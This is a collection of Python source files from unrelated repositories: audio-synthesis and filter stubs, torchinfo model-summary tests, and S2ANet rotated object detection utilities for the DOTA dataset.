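The stubs suggest the classic windowed-sinc construction, where a highpass kernel is obtained by spectrally inverting a lowpass one; a hedged numpy sketch of that idea, not necessarily the intended implementation:
```python
import numpy as np
def sinc_lowpass(cutoff_ratio: float, num_taps: int = 101) -> np.ndarray:
    # windowed-sinc lowpass kernel; cutoff_ratio = cutoff_hz / sample_rate
    n = np.arange(num_taps) - (num_taps - 1) / 2
    h = np.sinc(2 * cutoff_ratio * n) * np.hamming(num_taps)
    return h / h.sum()  # unity gain at DC
def invert_spectrum(kernel: np.ndarray) -> np.ndarray:
    # highpass = delta - lowpass (kernel length must be odd)
    inverted = -kernel
    inverted[len(kernel) // 2] += 1.0
    return inverted
```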
#### File: eq/filter/vec.py
```python
from __future__ import annotations
from typing import Sequence, TypeVar
import numpy as np
from ..base import Frequency
T = TypeVar("T")
usize = int
class Vector(Sequence, np.ndarray):
    # ndarray subclasses are created by view-casting in __new__;
    # ndarray.__init__ does not accept the element data
    def __new__(cls, arraylike: Sequence[T]) -> "Vector":
        return np.asarray(arraylike).view(cls)
```
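With the view-casting fix above, instances behave like arrays and keep their subclass through ufuncs; a short check, assuming `Vector` is importable:
```python
v = Vector([1.0, 2.0, 3.0])
doubled = v * 2
print(type(doubled).__name__)  # Vector (subclass survives ufuncs)
print(doubled.tolist())        # [2.0, 4.0, 6.0]
```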
#### File: wave/transformold/fill.py
```python
from ..base.envelope import Envelope
from ..base.sound import Sound
from ..base.sinusoid import Sinusoid
from .transform import Transform
class Fill(Transform):
def __init__(self, envelope: Envelope):
self.__envelope = envelope
#######
@property
def envelope(self) -> Envelope:
return self.__envelope
def apply(self, sound: Sound) -> Sound:
sinusoids = (
# TODO: this can be add envelope method in Sinusoid
Sinusoid(
sinusoid.frequency, sinusoid.amplitude, sinusoid.step, self.envelope
)
for sinusoid in sound.sinusoids
)
return Sound(sinusoids)
```
#### File: wave/transformold/transform.py
```python
# from abc import ABCMeta, abstractmethod
# from typing import Iterator
# class Transform(metaclass=ABCMeta):
# def __init__(self):
# pass
# @property
# @abstractmethod
# def waveform(self) -> Iterator[float]:
# pass
```
#### File: transformold/volume/base.py
```python
from ear4.wave import Decibel
from ..base import XY
# TODO: do decibel for now
class VolumeVolume(XY):
def __init__(self):
super().__init__(Decibel, Decibel)
```
#### File: transformold/vv/base.py
```python
from ear4.wave import Volume
from ..base import XY
class VolumeVolume(XY):
def __init__(self):
super().__init__(Volume, Volume)
```
#### File: wave/wave/soundwave.py
```python
# from __future__ import annotations
# from typing import List, Optional, Iterator
# from .sinusoid import Sinusoid
## considering moving this to synth folder
# import numpy as np
# class Soundwave:
# def __init__(
# self,
# sinusoids: List[Sinusoid],
# # origin: Union[Primitive, Transform],
# id: int = 0,
# name: Optional[str] = None,
# ):
# self.__id = id
# self.__sinusoids = sinusoids
# #######
# @property
# def sinusoids(self) -> List[Sinusoid]:
# return self.__sinusoids
# # CHANGE TO POSITION
# @property
# def waveform(self) -> Iterator[float]:
# """This should really be called wave position."""
# # TODO: this has some major issues
# position = 0
# for sinusoid in self.sinusoids:
# position += next(sinusoid.waveform)
# yield position
# # TODO: how can we better leverage generators?
# # this is ugly... clean me!
# def as_array(self, number_of_samples: int) -> np.ndarray:
# arr = np.zeros(number_of_samples)
# for i in range(number_of_samples):
# arr[i] = next(self.waveform)
# return arr
# # TODO: possibly move transforms to sound manager / cursor (also fits with ID)
# ##############
# # TRANSFORMS #
# # def aggregate(self, sounds: List[Sound], weights: List[float]) -> Sound:
# # aggregation = Aggregation(sounds.append(self), weights.append(1 - sum(weights)))
# # return aggregation.apply()
# # def apply(self, transform: Transform) -> Sound:
# # return Sound(
# # waveform=transform.waveform,
# # origin_sound=[self],
# # origin_transform=transform,
# # parameters=self.parameters,
# # )
# # # def delay(self, delaying: Delaying) -> Sound:
# # return delaying.apply(self)
# # def widen(self, widening: Widening) -> Sound:
# # return widening.apply(self)
# # def pan(self, panning: Panning) -> Sound:
# # return panning.apply(self)
# # def distort(self, distortion: Distortion) -> Sound:
# # return distortion.apply(self)
```
#### File: time/envelope/anchor.py
```python
from collections import OrderedDict
from dataclasses import dataclass
from .level import Level
__all__ = ["Anchor"]
@dataclass
class _Anchors:
dict: OrderedDict[int, Level]
class _Anchors_(_Anchors):
    def end_block(self) -> int:
        # the ending block is the last key in the ordered mapping
        return next(reversed(self.dict))
class _Validate_(_Anchors_, _Anchors):
def _validate_insert(self):
...
def _validate_append(self, block: int):
assert block > self.end_block()
def _validate_modify(self):
...
def _validate_remove(self, block: int):
assert block in self.dict.keys(), "Block is not in keys."
class _Mutate_(_Validate_, _Anchors):
def insert(self):
...
def append(self):
...
def modify(self, block: int, level: Level):
...
def remove(self):
...
class _Display_(_Anchors):
def __repr__(self):
...
class Anchors(_Anchors_, _Anchors):
def __init__(self):
super().__init__(OrderedDict())
```
#### File: time/envelope/envelope.py
```python
from __future__ import annotations
from collections import OrderedDict
from dataclasses import dataclass
from enum import Enum
from typing import Optional, Sequence
from numpy import interp
import numpy as np
from .level import Level
__all__ = ["Envelope"]
@dataclass
class _Envelope:
anchors: OrderedDict[int, Level]
class _Envelope_:
    # this should just be a vector...
def interpolate(self) -> np.ndarray:
...
class _Default_:
@staticmethod
    def triangle() -> Envelope:
...
class _From_:
@staticmethod
def from_adsr(
attack: Level,
decay: Level,
sustain: Optional[Level] = None,
release: Optional[Level] = None,
):
...
class Envelope(
_Default_,
_Envelope_,
_Envelope,
):
def __init__(self):
...
# class LevelEnvelope:
# """Level envelope (2D)."""
# def __init__(self, anchors: Sequence[LevelAnchor]):
# self.__anchors = {0: 0}
# for anchor in anchors:
# self.add_anchor(anchor)
# # assert (
# # self.anchors[0] == 0
# # ), f"Beginning anchor ({self.anchors[0]}) must be (0, 0)."
# # assert (
# # self.anchors[max(self.anchors.keys())] == 0
# # ), "Ending anchor must have level 0."
# @staticmethod
# def from_dict(anchors: dict[int, int]) -> LevelEnvelope:
# return LevelEnvelope(
# [LevelAnchor(frame, level) for frame, level in anchors.items()]
# )
# # def __repr__(self) -> str:
# # ret = f"""
# # Level Envelope
# # ##############
# # """
# # ret += "\n".join([str(anchor) for anchor in self._anchors])
# # return ret
# @property
# def anchors(self) -> OrderedDict[int, int]:
# return OrderedDict(sorted(self.__anchors.items()))
# def add_anchor(self, anchor: LevelAnchor):
# self.__anchors[anchor.frame] = anchor.level
# def get_level(self, frame: float) -> float:
# assert frame >= 0, "Frame must be positive."
# lower_bound = max(
# (key for key in self.anchors.keys() if key <= frame),
# default=min(key for key in self.anchors.keys()),
# )
# upper_bound = min(
# (key for key in self.anchors.keys() if key >= frame),
# default=max(key for key in self.anchors.keys()),
# )
# return interp(
# frame,
# [lower_bound, upper_bound],
# [self.anchors[lower_bound], self.anchors[upper_bound]],
# )
# @property
# def finish(self) -> float:
# # TODO: this can also be last key
# return max(self.anchors.keys())
# class FrequencyAnchor:
# """Anchor point for envelope."""
# def __init__(self, frequency: int, level_envelope: LevelEnvelope):
# # TODO: make frequency relative later
# self.__frequency = frequency
# self.__level_envelope = level_envelope
# # assert (
# # 0 <= self.level <= 100
# # ), "Level (relative amplitude) must be between 0 and 100."
# @property
# def frequency(self) -> int:
# return self.__frequency
# @property
# def level_envelope(self) -> LevelEnvelope:
# return self.__level_envelope
# class Envelope:
# """Level + Frequency Envelope (3D)."""
# def __init__(self, frequency_anchors: Sequence[FrequencyAnchor]):
# self.__frequency_anchors = {}
# for anchor in frequency_anchors:
# self.add_anchor(anchor)
# @staticmethod
# def from_dict(anchors: dict[int, LevelEnvelope]):
# return Envelope([FrequencyAnchor(key, value) for key, value in anchors.items()])
# @property
# def frequency_anchors(self) -> OrderedDict[int, LevelEnvelope]:
# return OrderedDict(sorted(self.__frequency_anchors.items()))
# # TODO: this needs a test!
# @property
# def ending_frame(self) -> float:
# return max(env.finish for env in self.frequency_anchors.values())
# def add_anchor(self, anchor: FrequencyAnchor):
# self.__frequency_anchors[anchor.frequency] = anchor.level_envelope
# def get_level(self, frame: float, frequency: float) -> float:
# """Level envelope at a frame & frequency."""
# assert frame >= 0
# lower_frequency_bound = max(
# (key for key in self.frequency_anchors.keys() if key <= frequency),
# default=min(key for key in self.frequency_anchors.keys()),
# )
# upper_frequency_bound = min(
# (key for key in self.frequency_anchors.keys() if key >= frequency),
# default=max(key for key in self.frequency_anchors.keys()),
# )
# lower_level = self.frequency_anchors[lower_frequency_bound].get_level(frame)
# upper_level = self.frequency_anchors[upper_frequency_bound].get_level(frame)
# return interp(
# frequency,
# [lower_frequency_bound, upper_frequency_bound],
# [lower_level, upper_level],
# )
# # class AmplitudeEnvelope:
# # def __init__(
# # self,
# # floor: float = 0,
# # ceiling: float = 1,
# # envelope: Optional[Envelope] = None,
# # ):
# # assert ceiling > floor, "Ceiling must be greater than floor."
# # self.__floor = floor
# # self.__ceiling = ceiling
# # self.__envelope = envelope
# # @property
# # def floor(self) -> float:
# # return self.__floor
# # @property
# # def ceiling(self) -> float:
# # return self.__ceiling
# # @property
# # def range(self) -> float:
# # return self.ceiling - self.floor
# # @property
# # def envelope(self) -> Optional[Envelope]:
# # return self.__envelope
# # @property
# # def ending_frame(self) -> Optional[float]:
# # if self.envelope is not None:
# # return self.envelope.ending_frame
# # else:
# # return None
# # def amplitude(self, frame: float, frequency: float) -> float:
# # if self.envelope is None:
# # return self.ceiling
# # else:
# # return self.floor + self.range * self.envelope.get_level(frame, frequency)
# # def mix(self, env: AmplitudeEnvelope, target: AmplitudeEnvelope):
# # pass
# # make simple case of level envelope for now, but do experiment
# # THIS NEEDS TO EVENTUALLY BE EXTENDED TO MODULATION! think precisely about what envelopes are
# # class FrequencyEnvelope:
# # def __init__(
# # self,
# # base: float,
# # target: Optional[float] = None,
# # envelope: Optional[LevelEnvelope] = None,
# # ):
# # self.__base = base
# # self.__target = target
# # self.__envelope = envelope
# # @property
# # def base(self) -> float:
# # return self.__base
# # @property
# # def target(self) -> Optional[float]:
# # return self.__target
# # @property
# # def range(self) -> float:
# # return self.target - self.base
# # @property
# # def envelope(self) -> Optional[LevelEnvelope]:
# # return self.__envelope
# # def frequency(self, frame: float) -> float:
# # if self.envelope is None:
# # return self.base
# # else:
# # return self.base + self.range * self.envelope.get_level(frame)
```
|
{
"source": "jedi2610/torchinfo",
"score": 2
}
|
#### File: torchinfo/tests/torchinfo_test.py
```python
from typing import Any
import torch
from torch import nn
from torch.nn.utils import prune
from tests.conftest import verify_output_str
from tests.fixtures.models import (
AutoEncoder,
ContainerModule,
CustomParameter,
DictParameter,
EmptyModule,
FakePrunedLayerModel,
LinearModel,
LSTMNet,
MixedTrainableParameters,
ModuleDictModel,
MultipleInputNetDifferentDtypes,
NamedTuple,
PackPaddedLSTM,
ParameterListModel,
PartialJITModel,
PrunedLayerNameModel,
RecursiveNet,
ReturnDict,
ReuseLinear,
ReuseLinearExtended,
ReuseReLU,
SiameseNets,
SingleInputNet,
UninitializedParameterModel,
)
from torchinfo import ColumnSettings, summary
from torchinfo.enums import Verbosity
def test_basic_summary() -> None:
model = SingleInputNet()
summary(model)
def test_string_result() -> None:
results = summary(SingleInputNet(), input_size=(16, 1, 28, 28))
result_str = f"{results}\n"
verify_output_str(result_str, "tests/test_output/string_result.out")
def test_single_input() -> None:
model = SingleInputNet()
# input_size keyword arg intentionally omitted.
results = summary(model, (2, 1, 28, 28))
assert len(results.summary_list) == 6, "Should find 6 layers"
assert results.total_params == 21840
assert results.trainable_params == 21840
def test_input_tensor() -> None:
metrics = summary(SingleInputNet(), input_data=torch.randn(5, 1, 28, 28))
assert metrics.input_size == torch.Size([5, 1, 28, 28])
def test_batch_size_optimization() -> None:
model = SingleInputNet()
# batch size intentionally omitted.
results = summary(model, (1, 28, 28), batch_dim=0)
assert len(results.summary_list) == 6, "Should find 6 layers"
assert results.total_params == 21840
assert results.trainable_params == 21840
def test_single_linear_layer() -> None:
model = torch.nn.Linear(2, 5)
results = summary(model)
results = summary(model, input_size=(1, 2))
assert results.total_params == 15
assert results.trainable_params == 15
def test_uninitialized_tensor() -> None:
model = UninitializedParameterModel()
summary(model)
def test_multiple_input_types() -> None:
model = MultipleInputNetDifferentDtypes()
input_size = (1, 300)
if torch.cuda.is_available():
dtypes = [
torch.cuda.FloatTensor, # type: ignore[attr-defined]
torch.cuda.LongTensor, # type: ignore[attr-defined]
]
else:
dtypes = [torch.FloatTensor, torch.LongTensor]
results = summary(model, input_size=[input_size, input_size], dtypes=dtypes)
assert results.total_params == 31120
assert results.trainable_params == 31120
def test_single_input_all_cols() -> None:
model = SingleInputNet()
col_names = ("kernel_size", "input_size", "output_size", "num_params", "mult_adds")
input_shape = (7, 1, 28, 28)
summary(
model,
input_data=torch.randn(*input_shape),
depth=1,
col_names=col_names,
col_width=20,
)
def test_single_input_batch_dim() -> None:
model = SingleInputNet()
col_names = ("kernel_size", "input_size", "output_size", "num_params", "mult_adds")
summary(
model,
input_size=(1, 28, 28),
depth=1,
col_names=col_names,
col_width=20,
batch_dim=0,
)
def test_pruning() -> None:
model = SingleInputNet()
for module in model.modules():
if isinstance(module, (torch.nn.Conv2d, torch.nn.Linear)):
prune.l1_unstructured( # type: ignore[no-untyped-call]
module, "weight", 0.5
)
results = summary(model, input_size=(16, 1, 28, 28))
assert results.total_params == 10965
assert results.total_mult_adds == 3957600
def test_dict_input() -> None:
# TODO: expand this test to handle intermediate dict layers.
model = MultipleInputNetDifferentDtypes()
input_data = torch.randn(1, 300)
other_input_data = torch.randn(1, 300).long()
summary(model, input_data={"x1": input_data, "x2": other_input_data})
def test_row_settings() -> None:
model = SingleInputNet()
summary(model, input_size=(16, 1, 28, 28), row_settings=("var_names",))
def test_jit() -> None:
model = LinearModel()
model_jit = torch.jit.script(model)
x = torch.randn(64, 128)
regular_model = summary(model, input_data=x)
jit_model = summary(model_jit, input_data=x)
assert len(regular_model.summary_list) == len(jit_model.summary_list)
def test_partial_jit() -> None:
model_jit = torch.jit.script(PartialJITModel())
summary(model_jit, input_data=torch.randn(2, 1, 28, 28))
def test_custom_parameter() -> None:
model = CustomParameter(8, 4)
summary(model, input_size=(1,))
def test_parameter_list() -> None:
model = ParameterListModel()
summary(
model,
input_size=(100, 100),
verbose=2,
col_names=list(ColumnSettings),
col_width=15,
)
def test_dict_parameters_1() -> None:
model = DictParameter()
input_data = {256: torch.randn(10, 1), 512: [torch.randn(10, 1)]}
summary(model, input_data={"x": input_data, "scale_factor": 5})
def test_dict_parameters_2() -> None:
model = DictParameter()
input_data = {256: torch.randn(10, 1), 512: [torch.randn(10, 1)]}
summary(model, input_data={"x": input_data}, scale_factor=5)
def test_dict_parameters_3() -> None:
model = DictParameter()
input_data = {256: torch.randn(10, 1), 512: [torch.randn(10, 1)]}
summary(model, input_data=[input_data], scale_factor=5)
def test_lstm() -> None:
# results = summary(LSTMNet(), input_size=(100, 1), dtypes=[torch.long])
results = summary(
LSTMNet(),
input_size=(1, 100),
dtypes=[torch.long],
verbose=Verbosity.VERBOSE,
col_width=20,
col_names=("kernel_size", "output_size", "num_params", "mult_adds"),
row_settings=("var_names",),
)
assert len(results.summary_list) == 4, "Should find 4 layers"
def test_lstm_custom_batch_size() -> None:
# batch_size intentionally omitted.
results = summary(LSTMNet(), (100,), dtypes=[torch.long], batch_dim=1)
assert len(results.summary_list) == 4, "Should find 4 layers"
def test_recursive() -> None:
results = summary(RecursiveNet(), input_size=(1, 64, 28, 28))
second_layer = results.summary_list[2]
assert len(results.summary_list) == 7, "Should find 7 layers"
assert (
second_layer.num_params_to_str(reached_max_depth=False) == "(recursive)"
), "should not count the second layer again"
assert results.total_params == 36928
assert results.trainable_params == 36928
assert results.total_mult_adds == 173709312
def test_siamese_net() -> None:
metrics = summary(SiameseNets(), input_size=[(1, 1, 88, 88), (1, 1, 88, 88)])
assert round(metrics.float_to_megabytes(metrics.total_input), 2) == 0.25
def test_container() -> None:
summary(ContainerModule(), input_size=(1, 5), depth=4)
def test_empty_module() -> None:
summary(EmptyModule())
def test_device() -> None:
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
model = SingleInputNet()
# input_size
summary(model, input_size=(5, 1, 28, 28), device=device)
# input_data
input_data = torch.randn(5, 1, 28, 28)
summary(model, input_data=input_data)
summary(model, input_data=input_data, device=device)
summary(model, input_data=input_data.to(device))
summary(model, input_data=input_data.to(device), device=torch.device("cpu"))
def test_pack_padded() -> None:
x = torch.ones([20, 128]).long()
# fmt: off
y = torch.Tensor([
13, 12, 11, 11, 11, 11, 11, 11, 11, 11, 10, 10, 10, 10, 10,
10, 10, 10, 10, 10, 10, 10, 10, 10, 9, 9, 9, 9, 9, 9, 9, 9,
9, 9, 9, 9, 9, 9, 8, 8, 8, 8, 8, 8, 8, 8, 8, 7, 7, 7, 7, 7,
7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 7, 6, 6, 6, 6, 6, 6,
6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6, 6,
6, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5, 5,
5, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4, 4
]).long()
# fmt: on
summary(PackPaddedLSTM(), input_data=x, lengths=y)
def test_module_dict() -> None:
summary(
ModuleDictModel(),
input_data=torch.randn(1, 10, 3, 3),
layer_type="conv",
activation_type="lrelu",
)
def test_model_with_args() -> None:
summary(RecursiveNet(), input_size=(1, 64, 28, 28), args1="args1", args2="args2")
def test_input_size_possibilities() -> None:
test = CustomParameter(2, 3)
summary(test, input_size=[(2,)])
summary(test, input_size=((2,),))
summary(test, input_size=(2,))
summary(test, input_size=[2])
def test_multiple_input_tensor_args() -> None:
input_data = torch.randn(1, 300)
other_input_data = torch.randn(1, 300).long()
metrics = summary(
MultipleInputNetDifferentDtypes(), input_data=input_data, x2=other_input_data
)
assert metrics.input_size == torch.Size([1, 300])
def test_multiple_input_tensor_dict() -> None:
input_data = torch.randn(1, 300)
other_input_data = torch.randn(1, 300).long()
metrics = summary(
MultipleInputNetDifferentDtypes(),
input_data={"x1": input_data, "x2": other_input_data},
)
assert metrics.input_size == {
"x1": torch.Size([1, 300]),
"x2": torch.Size([1, 300]),
}
def test_multiple_input_tensor_list() -> None:
input_data = torch.randn(1, 300)
other_input_data = torch.randn(1, 300).long()
metrics = summary(
MultipleInputNetDifferentDtypes(), input_data=[input_data, other_input_data]
)
assert metrics.input_size == [torch.Size([1, 300]), torch.Size([1, 300])]
def test_namedtuple() -> None:
model = NamedTuple()
input_size = [(2, 1, 28, 28), (2, 1, 28, 28)]
named_tuple = model.Point(*input_size)
summary(model, input_size=input_size, z=named_tuple)
def test_return_dict() -> None:
input_size = [torch.Size([1, 28, 28]), [12]]
metrics = summary(ReturnDict(), input_size=input_size, col_width=65, batch_dim=0)
assert metrics.input_size == [(1, 28, 28), [12]]
def test_containers() -> None:
summary(ContainerModule(), input_size=(5,))
def test_autoencoder() -> None:
model = AutoEncoder()
summary(model, input_size=(1, 3, 64, 64))
def test_reusing_activation_layers() -> None:
act = nn.LeakyReLU(inplace=True)
model1 = nn.Sequential(act, nn.Identity(), act, nn.Identity(), act) # type: ignore[no-untyped-call] # noqa: E501
model2 = nn.Sequential(
nn.LeakyReLU(inplace=True),
nn.Identity(), # type: ignore[no-untyped-call]
nn.LeakyReLU(inplace=True),
nn.Identity(), # type: ignore[no-untyped-call]
nn.LeakyReLU(inplace=True),
)
result_1 = summary(model1)
result_2 = summary(model2)
assert len(result_1.summary_list) == len(result_2.summary_list) == 6
def test_mixed_trainable_parameters() -> None:
result = summary(MixedTrainableParameters(), verbose=Verbosity.VERBOSE)
assert result.trainable_params == 10
assert result.total_params == 20
def test_too_many_linear() -> None:
net = ReuseLinear()
summary(net, (2, 10))
def test_too_many_linear_plus_existing_hooks() -> None:
a, b = False, False
def pre_hook(module: nn.Module, inputs: Any) -> None:
del module, inputs
nonlocal a
a = True
def hook(module: nn.Module, inputs: Any, outputs: Any) -> None:
del module, inputs, outputs
nonlocal b
b = True
net = ReuseLinearExtended()
result_1 = summary(net, (2, 10))
net = ReuseLinearExtended()
net.linear.register_forward_pre_hook(pre_hook)
net.linear.register_forward_hook(hook)
result_2 = summary(net, (2, 10))
assert a is True
assert b is True
assert str(result_1) == str(result_2)
def test_too_many_relus() -> None:
summary(ReuseReLU(), (4, 4, 64, 64))
def test_pruned_adversary() -> None:
model = PrunedLayerNameModel(8, 4)
results = summary(model, input_size=(1,))
assert results.total_params == 32
second_model = FakePrunedLayerModel(8, 4)
results = summary(second_model, input_size=(1,))
assert results.total_params == 32 # should be 64
```
|
{
"source": "jedibobo/S2ANet-custom-dataset",
"score": 2
}
|
#### File: S2ANet-custom-dataset/DOTA_devkit/convert_dota_to_mmdet.py
```python
import os
import os.path as osp
import mmcv
import numpy as np
from PIL import Image
from mmdet.core import poly_to_rotated_box_single
wordname_15 = ['plane', 'baseball-diamond', 'bridge', 'ground-track-field',
'small-vehicle', 'large-vehicle', 'ship', 'tennis-court',
'basketball-court', 'storage-tank', 'soccer-ball-field', 'roundabout',
'harbor', 'swimming-pool', 'helicopter']
label_ids = {name: i + 1 for i, name in enumerate(wordname_15)}
def parse_ann_info(label_base_path, img_name):
lab_path = osp.join(label_base_path, img_name + '.txt')
bboxes, labels, bboxes_ignore, labels_ignore = [], [], [], []
with open(lab_path, 'r') as f:
for ann_line in f.readlines():
ann_line = ann_line.strip().split(' ')
bbox = [float(ann_line[i]) for i in range(8)]
# 8 point to 5 point xywha
bbox = tuple(poly_to_rotated_box_single(bbox).tolist())
class_name = ann_line[8]
difficult = int(ann_line[9])
            # annotations with difficult == 2 are dropped entirely
if difficult == 0:
bboxes.append(bbox)
labels.append(label_ids[class_name])
elif difficult == 1:
bboxes_ignore.append(bbox)
labels_ignore.append(label_ids[class_name])
return bboxes, labels, bboxes_ignore, labels_ignore
def convert_dota_to_mmdet(src_path, out_path, trainval=True, filter_empty_gt=True, ext='.png'):
"""Generate .pkl format annotation that is consistent with mmdet.
Args:
src_path: dataset path containing images and labelTxt folders.
out_path: output pkl file path
trainval: trainval or test
"""
img_path = os.path.join(src_path, 'images')
label_path = os.path.join(src_path, 'labelTxt')
img_lists = os.listdir(img_path)
data_dict = []
    for img in img_lists:
img_info = {}
img_name = osp.splitext(img)[0]
label = os.path.join(label_path, img_name + '.txt')
img = Image.open(osp.join(img_path, img))
img_info['filename'] = img_name + ext
img_info['height'] = img.height
img_info['width'] = img.width
if trainval:
if not os.path.exists(label):
print('Label:' + img_name + '.txt' + ' Not Exist')
continue
# filter images without gt to speed up training
if filter_empty_gt & (osp.getsize(label) == 0):
continue
bboxes, labels, bboxes_ignore, labels_ignore = parse_ann_info(label_path, img_name)
ann = {}
ann['bboxes'] = np.array(bboxes, dtype=np.float32)
ann['labels'] = np.array(labels, dtype=np.int64)
ann['bboxes_ignore'] = np.array(bboxes_ignore, dtype=np.float32)
ann['labels_ignore'] = np.array(labels_ignore, dtype=np.int64)
img_info['ann'] = ann
data_dict.append(img_info)
mmcv.dump(data_dict, out_path)
if __name__ == '__main__':
convert_dota_to_mmdet('data/dota_1024/trainval_split',
'data/dota_1024/trainval_split/trainval_s2anet.pkl')
convert_dota_to_mmdet('data/dota_1024/test_split',
'data/dota_1024/test_split/test_s2anet.pkl', trainval=False)
print('done!')
```
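`poly_to_rotated_box_single` turns the 8-value DOTA polygon into (cx, cy, w, h, angle); its exact angle convention lives in mmdet.core, but a hedged OpenCV-based approximation looks like this:
```python
import numpy as np
import cv2
def poly_to_xywha(poly8):
    # approximate 8-point polygon -> (cx, cy, w, h, angle in radians);
    # mmdet's real helper may normalize the angle differently
    pts = np.asarray(poly8, dtype=np.float32).reshape(4, 2)
    (cx, cy), (w, h), angle_deg = cv2.minAreaRect(pts)
    return cx, cy, w, h, np.deg2rad(angle_deg)
```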
#### File: bbox/samplers/random_sampler_rotated.py
```python
import torch
from .random_sampler import RandomSampler
from .sampling_result import SamplingResult
from ..builder import BBOX_SAMPLERS
@BBOX_SAMPLERS.register_module
class RandomSamplerRotated(RandomSampler):
def sample(self,
assign_result,
bboxes,
gt_bboxes,
gt_labels=None,
**kwargs):
gt_bboxes = gt_bboxes.float()
bboxes = bboxes.float()
if len(bboxes.shape) < 2:
bboxes = bboxes[None, :]
# this is the only difference between RandomSamplerRotated and RandomSampler
bboxes = bboxes[:, :5]
gt_flags = bboxes.new_zeros((bboxes.shape[0],), dtype=torch.uint8)
if self.add_gt_as_proposals:
bboxes = torch.cat([gt_bboxes, bboxes], dim=0)
assign_result.add_gt_(gt_labels)
gt_ones = bboxes.new_ones(gt_bboxes.shape[0], dtype=torch.uint8)
gt_flags = torch.cat([gt_ones, gt_flags])
num_expected_pos = int(self.num * self.pos_fraction)
pos_inds = self.pos_sampler._sample_pos(
assign_result, num_expected_pos, bboxes=bboxes, **kwargs)
# We found that sampled indices have duplicated items occasionally.
# (may be a bug of PyTorch)
pos_inds = pos_inds.unique()
num_sampled_pos = pos_inds.numel()
num_expected_neg = self.num - num_sampled_pos
# print('Pos:{} Neg:{}'.format(num_sampled_pos,num_expected_neg))
if self.neg_pos_ub >= 0:
_pos = max(1, num_sampled_pos)
neg_upper_bound = int(self.neg_pos_ub * _pos)
if num_expected_neg > neg_upper_bound:
num_expected_neg = neg_upper_bound
neg_inds = self.neg_sampler._sample_neg(
assign_result, num_expected_neg, bboxes=bboxes, **kwargs)
neg_inds = neg_inds.unique()
return SamplingResult(pos_inds, neg_inds, bboxes, gt_bboxes,
assign_result, gt_flags)
```
#### File: core/evaluation/dota_utils.py
```python
import os
import os.path as osp
from ..bbox import rotated_box_to_poly_single
def result2dota_task1(results, dst_path, dataset):
CLASSES = dataset.CLASSES
img_names = dataset.img_names
assert len(results) == len(
img_names), 'length of results must equal with length of img_names'
if not osp.exists(dst_path):
os.mkdir(dst_path)
for classname in CLASSES:
f_out = open(osp.join(dst_path, 'Task1_'+classname+'.txt'), 'w')
print('Task1_'+classname+'.txt')
# per result represent one image
for img_id, result in enumerate(results):
for class_id, bboxes in enumerate(result):
if CLASSES[class_id] != classname:
continue
if(bboxes.size != 0):
for bbox in bboxes:
score = bbox[5]
bbox = rotated_box_to_poly_single(bbox[:5])
temp_txt = '{} {:.4f} {:.4f} {:.4f} {:.4f} {:.4f} {:.4f} {:.4f} {:.4f} {:.4f}\n'.format(
osp.splitext(img_names[img_id])[0], score, bbox[0], bbox[1], bbox[2], bbox[3], bbox[4], bbox[5], bbox[6], bbox[7])
f_out.write(temp_txt)
f_out.close()
return True
def result2dota_task2(results, dst_path, dataset):
CLASSES = dataset.CLASSES
img_names = dataset.img_names
if not osp.exists(dst_path):
os.mkdir(dst_path)
for classname in CLASSES:
f_out = open(osp.join(dst_path, 'Task2_'+classname+'.txt'), 'w')
print('Task2_'+classname+'.txt')
# per result represent one image
for img_id, result in enumerate(results):
filename = img_names[img_id]
filename = osp.basename(filename)
filename = osp.splitext(filename)[0]
for class_id, bboxes in enumerate(result):
if CLASSES[class_id] != classname:
continue
if(bboxes.size != 0):
for bbox in bboxes:
score = bbox[4]
temp_txt = '{} {:.4f} {:.4f} {:.4f} {:.4f} {:.4f}\n'.format(
filename, score, bbox[0], bbox[1], bbox[2], bbox[3])
f_out.write(temp_txt)
f_out.close()
return True
```
#### File: ops/roi_align_rotated/roi_align_rotated.py
```python
import torch
from torch import nn
from torch.autograd import Function
from torch.autograd.function import once_differentiable
from torch.nn.modules.utils import _pair
from .roi_align_rotated_cuda import roi_align_rotated_forward, roi_align_rotated_backward
class _ROIAlignRotated(Function):
@staticmethod
def forward(ctx, input, roi, out_size, spatial_scale, sampling_ratio):
ctx.save_for_backward(roi)
ctx.out_size = out_size
ctx.spatial_scale = spatial_scale
ctx.sample_num = sampling_ratio
ctx.input_shape = input.size()
output = roi_align_rotated_forward(
input, roi, spatial_scale, out_size[0], out_size[1], sampling_ratio
)
return output
@staticmethod
@once_differentiable
def backward(ctx, grad_output):
(rois,) = ctx.saved_tensors
output_size = ctx.out_size
spatial_scale = ctx.spatial_scale
sampling_ratio = ctx.sample_num
bs, ch, h, w = ctx.input_shape
grad_input = roi_align_rotated_backward(
grad_output,
rois,
spatial_scale,
output_size[0],
output_size[1],
bs,
ch,
h,
w,
sampling_ratio,
)
return grad_input, None, None, None, None, None
roi_align_rotated = _ROIAlignRotated.apply
class RoIAlignRotated(nn.Module):
def __init__(self, out_size, spatial_scale, sample_num):
"""
Args:
out_size (tuple): h, w
spatial_scale (float): scale the input boxes by this number
sample_num (int): number of inputs samples to take for each output
sample. 0 to take samples densely.
Note:
roi_align_rotated supports continuous coordinate by default:
Given a continuous coordinate c, its two neighboring pixel indices (in our
pixel model) are computed by floor(c - 0.5) and ceil(c - 0.5). For example,
c=1.3 has pixel neighbors with discrete indices [0] and [1] (which are sampled
from the underlying signal at continuous coordinates 0.5 and 1.5).
"""
super(RoIAlignRotated, self).__init__()
self.out_size = _pair(out_size)
self.spatial_scale = spatial_scale
self.sample_num = sample_num
def forward(self, input, rois):
"""
Args:
input: NCHW images
rois: Bx6 boxes. First column is the index into N.
The other 5 columns are (x_ctr, y_ctr, width, height, angle_degrees).
"""
assert rois.dim() == 2 and rois.size(1) == 6
orig_dtype = input.dtype
if orig_dtype == torch.float16:
input = input.float()
rois = rois.float()
return roi_align_rotated(
input, rois, self.out_size, self.spatial_scale, self.sample_num
).to(dtype=orig_dtype)
def __repr__(self):
tmpstr = self.__class__.__name__ + "("
tmpstr += "out_size=" + str(self.out_size[0])
tmpstr += ", spatial_scale=" + str(self.spatial_scale)
tmpstr += ", sample_num=" + str(self.sample_num)
tmpstr += ")"
return tmpstr
```
